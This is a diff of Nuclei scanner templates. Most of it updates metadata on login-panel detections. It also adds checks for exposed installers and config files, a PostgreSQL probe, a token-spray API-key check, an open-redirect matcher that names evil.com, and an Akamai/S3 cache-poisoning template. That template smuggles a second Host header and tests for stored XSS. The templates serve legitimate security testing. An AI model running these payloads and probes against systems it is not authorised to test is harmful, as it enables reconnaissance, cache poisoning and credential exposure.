OpenCart is an open-source online store management system.
OpenCart login panel was detected.
reference:
- https://www.opencart.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"OpenCart"
@ -28,3 +32,5 @@ requests:
- '(?i)footer\s.*OpenCart.*All.Rights.Reserved|img\s.*logo.*\salt=.*OpenCart'
- "(?i)Powered.By.*http.*OpenCart"
condition: or
# Enhanced by md on 2023/01/03

9
exposed-panels/planet-estream-panel.yaml
View File

@ -1,9 +1,14 @@
id: planet-estream-panel
info:
name: Planet eStream Login Panel
name: Planet eStream Login Panel - Detect
author: arafatansari
severity: info
description: Planet eStream login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Login - Planet eStream"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/posthog-admin-panel.yaml
View File

@ -1,9 +1,14 @@
id: posthog-admin-panel
info:
name: Posthog Admin Panel
name: PostHog Login Panel - Detect
author: theabhinavgaur
severity: info
description: PostHog login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"posthog"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/retool-login.yaml
View File

@ -1,9 +1,14 @@
id: retool-login
info:
name: Retool Login
name: Retool Login Panel - Detect
author: DhiyaneshDk
severity: info
description: Retool login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Retool"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/riseup-panel.yaml
View File

@ -1,11 +1,16 @@
id: riseup-panel
info:
name: Rise Up Panel
name: Rise Up Login Panel - Detect
author: righettod
severity: info
description: Rise Up login panel was detected.
reference:
- https://www.riseup.ai/en/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
tags: panel,riseup
@ -33,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/rocketmq-console-exposure.yaml
View File

@ -1,9 +1,14 @@
id: rocketmq-console-exposure
info:
name: Apache RocketMQ Console Exposure
name: Apache RocketMQ Console Panel - Detect
author: pdteam
severity: info
description: Apache RocketMQ Console panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,apache
requests:
@ -15,3 +20,5 @@ requests:
- type: word
words:
- "<title>RocketMq-console-ng</title>"
# Enhanced by md on 2023/01/03

9
exposed-panels/room-alert-detect.yaml
View File

@ -1,11 +1,16 @@
id: room-alert-detect
info:
name: AVTECH Room Alert - Panel Detect
name: AVTECH Room Alert Login Panel - Detect
author: gy741
severity: info
description: AVTECH Room Alert login panel was detected.
reference:
- https://avtech.com/articles/166/how-to-access-a-room-alert-monitors-settings-pages-2/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Room Alert"
@ -36,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/royalevent-management-panel.yaml
View File

@ -1,9 +1,14 @@
id: royalevent-management-panel
info:
name: Royal Event Management Admin Panel
name: Royal Event Management System Admin Panel - Detect
author: ritikchaddha
severity: info
description: Royal Event Management System admin panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
tags: royalevent,panel
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/rsa-self-service.yaml
View File

@ -1,9 +1,14 @@
id: rsa-self-service
info:
name: Detect RSA Self-Service Panel
name: RSA Self-Service Login Panel - Detect
author: PR3R00T
severity: info
description: RSA Self-Service login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,rsa
requests:
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/rstudio-detect.yaml
View File

@ -1,9 +1,14 @@
id: rstudio-detect
info:
name: RStudio panel detector
name: RStudio Panel - Detect
author: philippedelteil
severity: info
description: RStudio panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,rstudio
requests:
@ -19,3 +24,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2023/01/03

57
exposed-panels/ruckus-wireless-admin-login.yaml
View File

@ -1,25 +1,32 @@
id: ruckus-wireless-admin-login
info:
name: Ruckus Wireless Admin Login Panel
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: title:"ruckus"
tags: panel,exposed,ruckus
requests:
- method: GET
path:
- '{{BaseURL}}/login.asp'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Ruckus Wireless Admin</title>"
- type: status
status:
- 200
id: ruckus-wireless-admin-login
info:
name: Ruckus Wireless Admin Login Panel - Detect
author: pussycat0x
severity: info
description: Ruckus Wireless admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"ruckus"
tags: panel,exposed,ruckus
requests:
- method: GET
path:
- '{{BaseURL}}/login.asp'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Ruckus Wireless Admin</title>"
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/ruijie/rg-uac-panel.yaml
View File

@ -1,9 +1,14 @@
id: rg-uac-panel
info:
name: RG-UAC Ruijie Login Panel
name: Ruijie RG-UAC Login Panel - Detect
author: princechaddha
severity: info
description: Ruijie RG-UAC login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.html:"Get_Verify_Info"
tags: panel,ruijie,router,firewall
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/rundeck-login.yaml
View File

@ -1,9 +1,14 @@
id: rundeck-login
info:
name: RunDeck Login Panel
name: Rundeck Login Panel - Detect
author: DhiyaneshDk, daffainfo
severity: info
description: Rundeck login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Rundeck"
@ -37,3 +42,5 @@ requests:
- 'utm_medium=([0-9.]+)-'
- 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck
- '<span class="version">([0-9.-]+)<\/span>' ## Detection on very old rudneck
# Enhanced by md on 2023/01/03

9
exposed-panels/rustici-content-controller.yaml
View File

@ -1,9 +1,14 @@
id: rustici-content-controller
info:
name: Rustici Content Controller
name: Rustici Content Controller Panel - Detect
author: DhiyaneshDk
severity: info
description: Rustici Content Controller panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Rustici Content Controller"
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

11
exposed-panels/saferoads-vms-login.yaml
View File

@ -1,11 +1,16 @@
id: saferoads-vms-login
info:
name: Saferoads VMS Login
name: Saferoads VMS Login Panel - Detect
author: dhiyaneshDk
severity: info
description: Saferoads VMS login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6941
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,edb
requests:
@ -15,4 +20,6 @@ requests:
matchers:
- type: word
words:
- 'Saferoads VMS'
- 'Saferoads VMS'
# Enhanced by md on 2023/01/03

9
exposed-panels/sage-panel.yaml
View File

@ -1,9 +1,14 @@
id: sage-panel
info:
name: Sage X3 Login Panel
name: Sage X3 Login Panel - Detect
author: pikpikcu,daffainfo
severity: info
description: Sage X3 login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/samba-swat-panel.yaml
View File

@ -1,9 +1,14 @@
id: samba-swat-panel
info:
name: Samba SWAT panel
name: Samba SWAT Panel - Detect
author: PR3R00T
severity: info
description: Samba SWAT panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,samba
requests:
@ -16,3 +21,5 @@ requests:
words:
- 'Basic realm="SWAT"'
part: header
# Enhanced by md on 2023/01/03

9
exposed-panels/samsung-printer-detect.yaml
View File

@ -1,9 +1,14 @@
id: samsung-printer-detect
info:
name: SAMSUNG Printer Detection
name: Samsung Printer Panel - Detect
author: pussycat0x
severity: info
description: Samsung printer panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: app="SAMSUNG-Printer"
tags: iot,panel,samsung,printer
@ -22,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/sap-hana-xsengine-panel.yaml
View File

@ -1,9 +1,14 @@
id: sap-hana-xsengine-panel
info:
name: SAP HANA XSEngine Admin Panel
name: SAP HANA XS Engine Admin Login Panel - Detect
author: PR3R00T
severity: info
description: SAP HANA XS Engine admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,sap
requests:
@ -16,3 +21,5 @@ requests:
words:
- "/sap/hana/xs/formLogin/images/sap.png"
part: body
# Enhanced by md on 2023/01/03

31
exposed-panels/watershed-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: watershed-panel
info:
name: Watershed Panel Detect
author: tess
severity: info
metadata:
verified: "true"
shodan-query: http.title:"Watershed LRS"
tags: panel,watershed
requests:
- method: GET
path:
- '{{BaseURL}}/app/outside.html#/signin'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Watershed LRS"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

28
exposed-panels/zoho/manageengine-network-config.yaml Normal file
View File

@ -0,0 +1,28 @@
id: manageengine-network-config
info:
name: Zoho Manage Engine Network Configuration Manager
author: righettod
severity: info
metadata:
verified: "true"
shodan-query: http.title:"Network Configuration Manager"
tags: panel,zoho,manageengine
requests:
- method: GET
path:
- '{{BaseURL}}/apiclient/ember/Login.jsp'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Network Configuration Manager'
- 'https://www.manageengine.com'
condition: and
- type: status
status:
- 200

10
exposures/configs/zend-config-file.yaml
View File

@ -2,7 +2,7 @@ id: zend-config-file
info:
name: Zend Configuration File
author: pdteam,geeknik
author: pdteam,geeknik,Akokonunes
severity: high
tags: config,exposure,zend,php
@ -26,10 +26,10 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "resources.db.params.password"
- "resources.db.params.username"
- type: regex
regex:
- "db.*(.password).*="
- "db.*(.username).*="
condition: and
- type: word

2
exposures/files/appsettings-file-disclosure.yaml
View File

@ -16,7 +16,9 @@ requests:
- method: GET
path:
- "{{BaseURL}}/appsettings.json"
- "{{BaseURL}}/appsettings.Production.json"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

29
exposures/mobiproxy-dashboard.yaml Normal file
View File

@ -0,0 +1,29 @@
id: mobiproxy-dashboard
info:
name: MobiProxy Dashboard Exposure
author: tess
severity: medium
metadata:
verified: true
shodan-dork: http.title:"MobiProxy"
tags: dashboard,exposure,mobiproxy
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>MobiProxy'
- 'Dashboard'
- 'Setting'
condition: and
- type: status
status:
- 200

2
miscellaneous/old-copyright.yaml
View File

@ -18,7 +18,7 @@ requests:
- type: word
part: body
words:
- '2022'
- '2023'
negative: true
- type: regex

0
misconfiguration/akamai-arl-xss.yaml → misconfiguration/akamai/akamai-arl-xss.yaml
View File

64
misconfiguration/akamai/akamai-s3-cache-poisoning.yaml Normal file
View File

@ -0,0 +1,64 @@
id: akamai-s3-cache-poisoning
info:
name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting
author: DhiyaneshDk
severity: high
reference:
- https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
- https://owasp.org/www-community/attacks/Cache_Poisoning
metadata:
verified: "true"
tags: cache,poisoning,generic,xss,akamai,s3
variables:
rand: "{{rand_base(5)}}"
requests:
- raw:
- |+
GET /nuclei.svg?{{rand}}=x HTTP/1.1
Host: {{Hostname}}
{{escape}}Host: {{bucket}}
- |+
GET /nuclei.svg?{{rand}}=x HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
payloads:
escape:
- "\x0b"
- "\x0c"
- "\x1c"
- "\x1d"
- "\x1e"
- "\x1f"
bucket:
- "nuclei-ap-northeast-1"
- "nuclei-ap-northeast-2"
- "nuclei-ap-northeast-3"
- "nuclei-ap-south-1"
- "nuclei-ap-southeast-1"
- "nuclei-ap-southeast-2"
- "nuclei-ca-central-1"
- "nuclei-eu-central-1"
- "nuclei-eu-north-1"
- "nuclei-eu-west-1"
- "nuclei-eu-west-2"
- "nuclei-eu-west-3"
- "nuclei-sa-east-1"
- "nuclei-us-east-1"
- "nuclei-us-east-2"
- "nuclei-us-west-1"
- "nuclei-us-west-2"
stop-at-first-match: true
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "alert(document.domain)")'
- 'status_code_2 == 200'
condition: and

33
misconfiguration/installer/acunetix-360-installer.yaml Normal file
View File

@ -0,0 +1,33 @@
id: acunetix-360-installer
info:
name: Acunetix 360 Installer
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-347188002
tags: misconfig,exposure,install,acunetix
requests:
- method: GET
path:
- "{{BaseURL}}/wizard/database/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Acunetix 360 - Installation Wizard"
- "License"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

33
misconfiguration/installer/impresspages-installer.yaml Normal file
View File

@ -0,0 +1,33 @@
id: impresspages-installer
info:
name: ImpressPages Installer
author: pussycat0x
severity: low
metadata:
verified: true
shodan-query: http.title:"ImpressPages installation wizard"
tags: misconfig,exposure,install,impresspages
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ImpressPages installation wizard"
- "Configuration"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

26
misconfiguration/installer/monstra-installer.yaml Normal file
View File

@ -0,0 +1,26 @@
id: monstra-installer
info:
name: Monstra Installation Exposure
author: ritikchaddha
severity: high
metadata:
verified: true
shodan-query: 'title:"Monstra :: Install"'
tags: misconfig,monstra,install
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Monstra :: Install"
- type: status
status:
- 200

33
misconfiguration/installer/netsparker-enterprise-installer.yaml Normal file
View File

@ -0,0 +1,33 @@
id: netsparker-enterprise-installer
info:
name: Netsparker Enterprise Installer
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-1575154882
tags: misconfig,exposure,install,netsparker
requests:
- method: GET
path:
- "{{BaseURL}}/wizard/database/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Netsparker Enterprise - Installation Wizard"
- "Netsparker Ltd"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

33
misconfiguration/installer/orangehrm-installer.yaml Normal file
View File

@ -0,0 +1,33 @@
id: orangehrm-installer
info:
name: OrangeHrm Installer
author: pussycat0x
severity: high
metadata:
verified: true
shodan-query: http.title:"OrangeHRM Web Installation Wizard"
tags: misconfig,exposure,install,orangehrm
requests:
- method: GET
path:
- "{{BaseURL}}/installer/installerUI.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "OrangeHRM Web Installation Wizard"
- "admin user creation"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

39
network/detection/pgsql-detect.yaml Normal file
View File

@ -0,0 +1,39 @@
id: pgsql-detect
info:
name: Postgresql Detection
author: nybble04
severity: info
description: |
PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance.
reference:
- https://www.postgresql.org/docs/current/errcodes-appendix.html
- https://www.postgresql.org/docs/current/client-authentication-problems.html
metadata:
verified: true
shodan-query: port:5432 product:"PostgreSQL"
tags: network,postgresql,db
network:
- inputs:
- data: "000000500003000075736572006e75636c6569006461746162617365006e75636c6569006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000"
type: hex
- data: "7000000036534352414d2d5348412d32353600000000206e2c2c6e3d2c723d000000000000000000000000000000000000000000000000"
type: hex
host:
- "{{Hostname}}"
- "{{Host}}:5432"
read-size: 2048
matchers:
- type: word
part: body
words:
- "28000" # Error code for invalid_authorization_specification
- "28P01" # Error code for invalid_password
- "SCRAM-SHA-256" # Authentication prompt
- "pg_hba.conf" # Client authentication config file
- "user \"nuclei\"" # The user nuclei (sent in request) doesn't exist
- "database \"nuclei\"" # The db nuclei (sent in request) doesn't exist"
condition: or

25
technologies/akamai-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: akamai-detect
info:
name: akamai cdn detection
author: pdteam
severity: info
reference:
- https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview
- https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US
- https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
tags: akamai,cdn,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Pragma: akamai-x-cache-on
matchers:
- type: word
part: x_cache
words:
- "deploy.akamai"

10
technologies/s3-detect.yaml
View File

@ -10,8 +10,16 @@ requests:
- method: GET
path:
- "{{BaseURL}}/%c0"
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "(?:InvalidURI|InvalidArgument|NoSuchBucket)"
part: body
- type: dsl
dsl:
- 'contains(to_lower(server), "amazons3")'
- 'contains(to_lower(header), "x-amz-id")'
- 'contains(to_lower(header), "x-amz-request-id")'

25
token-spray/api-zerbounce.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-zerobounce
info:
name: Zerobounce API Test
author: 0xlittleboy
severity: info
reference:
- https://www.zerobounce.net/docs/email-validation-api-quickstart
metadata:
verified: true
tags: token-spray,zerobounce
self-contained: true
requests:
- method: GET
path:
- "https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12"
matchers:
- type: word
part: body
words:
- '"total":'
- '"start_date":'
- '"end_date":'
condition: and

2
vulnerabilities/generic/open-redirect.yaml
View File

@ -114,7 +114,7 @@ requests:
matchers-condition: and
matchers:
- type: regex
part: location
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
vulnerabilities/qibocms-file-download.yaml
View File

@ -1,7 +1,7 @@
id: qibocms-file-download
info:
name: Qibocms - Arbitary File Download
name: Qibocms - Arbitrary File Download
author: theabhinavgaur
severity: high
metadata:

2
vulnerabilities/vmware/vmware-nsx-stream-rce.yaml
View File

@ -21,7 +21,7 @@ info:
verified: true
shodan-query: title:"VMware Appliance Management"
fofa-query: title="VMware Appliance Management"
tags: rce,msf,vmware,xstream
tags: vmware,xstream,rce,msf
variables:
lowerrstr: "{{to_lower(rand_text_alpha(6))}}"